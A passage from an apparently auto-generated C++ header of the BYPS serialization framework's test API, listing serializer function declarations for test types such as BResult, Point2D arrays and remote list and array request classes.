void BSerializer_1912328929(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_1799280818
void BSerializer_2052610089(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_181681714
void BSerializer_1763202727(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_1823330785
void BSerializer_114088296(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_1831201218
void BSerializer_50516327(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_183594037
void BSerializer_15818284(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_184101377
void BSerializer_748770738(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_1859644668
void BSerializer_2130431383(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_1888107655
void BSerializer_2063745441(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_1888799711
void BSerializer_2051074845(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_1898022288
void BSerializer_515346332(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_19
void BSerializer_534004412(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_1972793385
void BSerializer_1958357790(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_1973996106
void BSerializer_1391760319(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_1997002548
void BSerializer_1082818537(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_2
void BSerializer_432867946(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_2028443792
void BSerializer_1664501789(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_2052431866
void BSerializer_1566928477(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_2053507648
void BSerializer_1814499786(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_2058423690
void BSerializer_1698849803(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_2064980445
void BSerializer_937508540(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_2067161310
void BSerializer_925799231(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_2087445849
void BSerializer_1650981375(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_21
void BSerializer_534004389(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_2123584667
void BSerializer_253151806(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_3
void BSerializer_432867945(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_31512998
void BSerializer_1620912700(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_39910537
void BSerializer_245460547(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_4
void BSerializer_432867944(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_476459792
void BSerializer_255681041(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_5
void BSerializer_432867943(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_51898890
void BSerializer_905019472(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_564008001
void BSerializer_1405156912(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_588723219
void BSerializer_1537615291(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_6
void BSerializer_432867942(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_601099730
void BSerializer_856233055(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_65775978
void BSerializer_1872312576(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_673917574
void BSerializer_2098743607(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_7
void BSerializer_432867941(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_7007
void BSerializer_2076960068(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_758319514
void BSerializer_1168951451(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_766441794
void BSerializer_1167917980(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_769021986
void BSerializer_580900026(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_8
void BSerializer_432867940(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_846419204
void BSerializer_167272824(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_8789515
void BSerializer_323111619(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_9001
void BSerializer_2076900492(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_936607009
void BSerializer_968248604(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_94341197
void BSerializer_1800858646(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_945713488
void BSerializer_1852992857(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_949340697
void BSerializer_996206823(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_955752991
void BSerializer_695494982(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.arr.ArrayTypes1dim
void BSerializer_2001(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.arr.ArrayTypes4dim
void BSerializer_2004(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.auth.SessionInfo
void BSerializer_65775978(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.cons.AllTypesC
void BSerializer_930294276(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.cons.AllTypesZ
void BSerializer_142458(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.cons.AllTypesZ[][]
void BSerializer_81775365(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.cons.ConfigResultOption
void BSerializer_1292137034(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.cons.ConfigResultOptionC
void BSerializer_114832566(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.cons.HebrewC
void BSerializer_1770673942(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.cons.HebrewZ
void BSerializer_1518668429(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.cons.HebrewZ[]
void BSerializer_92445340(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.cons.SordC
void BSerializer_632707056(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.cons.SordZ
void BSerializer_691830(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.enu.EnumPlanets[]
void BSerializer_1441131650(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.enu.UsePlanets
void BSerializer_10000(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.inherit.BRequest_BioFruitService_certify
void BSerializer_1435417025(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.inherit.BRequest_BioLemonService_useParing
void BSerializer_2108700976(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.inherit.BRequest_FruitService_squeeze
void BSerializer_1290167289(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.inherit.BRequest_LemonService_pick
void BSerializer_1022088379(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.inherit.BRequest_PlantService_grow
void BSerializer_695716901(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.inherit.BStub_BioFruitService
void BSerializer_363642571(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.inherit.BStub_BioLemonService
void BSerializer_474058508(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.inherit.BStub_FruitService
void BSerializer_715959905(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.inherit.BStub_LemonService
void BSerializer_605543968(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.inherit.BStub_PlantService
void BSerializer_1954605928(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.inherit.Class1
void BSerializer_6001(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.inherit.Class1Collections
void BSerializer_6004(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.inherit.Class2
void BSerializer_6002(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.inherit.Class3
void BSerializer_6003(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.inl.Actor
void BSerializer_171948703(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.inl.Matrix2D
void BSerializer_135329019(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.inl.Point2D
void BSerializer_1835035436(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.inl.Point2D[]
void BSerializer_184101377(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.inl.Point2D[][]
void BSerializer_827767075(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.inl.Point2D[][][]
void BSerializer_915212229(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.inl.Point2D[][][][]
void BSerializer_949340697(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.list.ListListTypes
void BSerializer_3002(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.list.ListTypes
void BSerializer_3001(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.map.MapTypes
void BSerializer_4001(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.prim.PrimitiveTypes
void BSerializer_1000(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.prim.PrimitiveTypes[]
void BSerializer_2053507648(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.prim.PrimitiveTypes[][]
void BSerializer_2030857950(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.prim.PrimitiveTypes[][][]
void BSerializer_1739334652(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.prim.PrimitiveTypes[][][][]
void BSerializer_758319514(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.priv.PrivateMembers
void BSerializer_8001(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.refs.Node
void BSerializer_9001(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteArrayTypes1dim_getBool
void BSerializer_2033416644(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteArrayTypes1dim_getByte
void BSerializer_2033426402(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteArrayTypes1dim_getChar
void BSerializer_2033439280(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteArrayTypes1dim_getDate
void BSerializer_2033462920(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteArrayTypes1dim_getDouble
void BSerializer_39293909(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteArrayTypes1dim_getFloat
void BSerializer_1384988990(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteArrayTypes1dim_getInt
void BSerializer_1874061867(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteArrayTypes1dim_getLong
void BSerializer_2033714518(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteArrayTypes1dim_getObject
void BSerializer_263295897(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteArrayTypes1dim_getPrimitiveTypes
void BSerializer_1992537556(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteArrayTypes1dim_getShort
void BSerializer_1373101854(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteArrayTypes1dim_getString
void BSerializer_394678379(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteArrayTypes1dim_setBool
void BSerializer_201441072(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteArrayTypes1dim_setByte
void BSerializer_201431314(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteArrayTypes1dim_setChar
void BSerializer_201418436(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteArrayTypes1dim_setDate
void BSerializer_201394796(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteArrayTypes1dim_setDouble
void BSerializer_253910985(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteArrayTypes1dim_setFloat
void BSerializer_1946101450(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteArrayTypes1dim_setInt
void BSerializer_1530512055(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteArrayTypes1dim_setLong
void BSerializer_201143198(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteArrayTypes1dim_setObject
void BSerializer_48678821(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteArrayTypes1dim_setPrimitiveTypes
void BSerializer_1362276920(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteArrayTypes1dim_setShort
void BSerializer_1934214314(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteArrayTypes1dim_setString
void BSerializer_180061303(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteArrayTypes23_sendArraysClass
void BSerializer_330036060(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteArrayTypes23_sendArraysInline
void BSerializer_1467243283(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteArrayTypes23_sendArraysInt
void BSerializer_1828268517(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteArrayTypes23_sendArraysObject
void BSerializer_1306614381(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteArrayTypes23_sendArraysString
void BSerializer_1175231899(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteArrayTypes4dim_getBool
void BSerializer_1874302495(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteArrayTypes4dim_getByte
void BSerializer_1874292737(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteArrayTypes4dim_getChar
void BSerializer_1874279859(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteArrayTypes4dim_getDate
void BSerializer_1874256219(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteArrayTypes4dim_getDouble
void BSerializer_1555969784(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteArrayTypes4dim_getFloat
void BSerializer_2029769285(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteArrayTypes4dim_getInt
void BSerializer_1325018648(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteArrayTypes4dim_getLong
void BSerializer_1874004621(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteArrayTypes4dim_getObject
void BSerializer_1253379978(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteArrayTypes4dim_getPrimitiveTypes
void BSerializer_483228169(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteArrayTypes4dim_getShort
void BSerializer_2041656421(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteArrayTypes4dim_getString
void BSerializer_1121997496(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteArrayTypes4dim_setBool
void BSerializer_185807085(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteArrayTypes4dim_setByte
void BSerializer_185816843(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteArrayTypes4dim_setChar
void BSerializer_185829721(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteArrayTypes4dim_setDate
void BSerializer_185853361(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteArrayTypes4dim_setDouble
void BSerializer_1770586860(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteArrayTypes4dim_setFloat
void BSerializer_1468656825(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteArrayTypes4dim_setInt
void BSerializer_1668568460(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteArrayTypes4dim_setLong
void BSerializer_186104959(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteArrayTypes4dim_setObject
void BSerializer_1467997054(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteArrayTypes4dim_setPrimitiveTypes
void BSerializer_456924651(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteArrayTypes4dim_setShort
void BSerializer_1480543961(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteArrayTypes4dim_setString
void BSerializer_1336614572(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteConstants_compare_AllTypesC
void BSerializer_1609344203(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteConstants_compare_HebrewC
void BSerializer_1711871378(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteEnums_getPlanet
void BSerializer_6352043(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteEnums_setPlanet
void BSerializer_220969119(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteInlineInstance_getActor
void BSerializer_600892860(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteInlineInstance_getPoint2DArray1dim
void BSerializer_188393247(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteInlineInstance_getPoint2DArray4dim
void BSerializer_188482620(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteInlineInstance_getPoint2DList
void BSerializer_1428313263(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteInlineInstance_getPoint2DListList
void BSerializer_1650554387(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteInlineInstance_getPoint2DMap
void BSerializer_646661333(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteInlineInstance_setActor
void BSerializer_1162005320(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteInlineInstance_setPoint2DArray1dim
void BSerializer_1355334613(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteInlineInstance_setPoint2DArray4dim
void BSerializer_1355245240(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteInlineInstance_setPoint2DList
void BSerializer_343422941(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteInlineInstance_setPoint2DListList
void BSerializer_730520735(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteInlineInstance_setPoint2DMap
void BSerializer_127469879(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteListTypes_getBoolean1
void BSerializer_2058662161(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteListTypes_getByte1
void BSerializer_608486403(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteListTypes_getByte2
void BSerializer_608486404(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteListTypes_getChar1
void BSerializer_608885621(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteListTypes_getDate1
void BSerializer_609618461(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteListTypes_getDouble1
void BSerializer_2129490906(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteListTypes_getFloat1
void BSerializer_1785569467(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteListTypes_getInt1
void BSerializer_2098036488(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteListTypes_getInt2
void BSerializer_2098036489(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteListTypes_getInt3
void BSerializer_2098036490(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteListTypes_getInt4
void BSerializer_2098036491(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteListTypes_getLong1
void BSerializer_617417999(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteListTypes_getObj1
void BSerializer_2098203392(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteListTypes_getPrimitiveTypes1
void BSerializer_1679973895(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteListTypes_getShort1
void BSerializer_2140896613(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteListTypes_getString1
void BSerializer_1597237350(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteListTypes_setBoolean1
void BSerializer_2147241989(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteListTypes_setByte1
void BSerializer_47373943(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteListTypes_setByte2
void BSerializer_47373944(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteListTypes_setChar1
void BSerializer_47773161(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteListTypes_setDate1
void BSerializer_48506001(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteListTypes_setDouble1
void BSerializer_228671154(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteListTypes_setFloat1
void BSerializer_1570952391(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteListTypes_setInt1
void BSerializer_136821228(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteListTypes_setInt2
void BSerializer_136821227(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteListTypes_setInt3
void BSerializer_136821226(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteListTypes_setInt4
void BSerializer_136821225(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.remote.BRequest_RemoteListTypes_setLong1
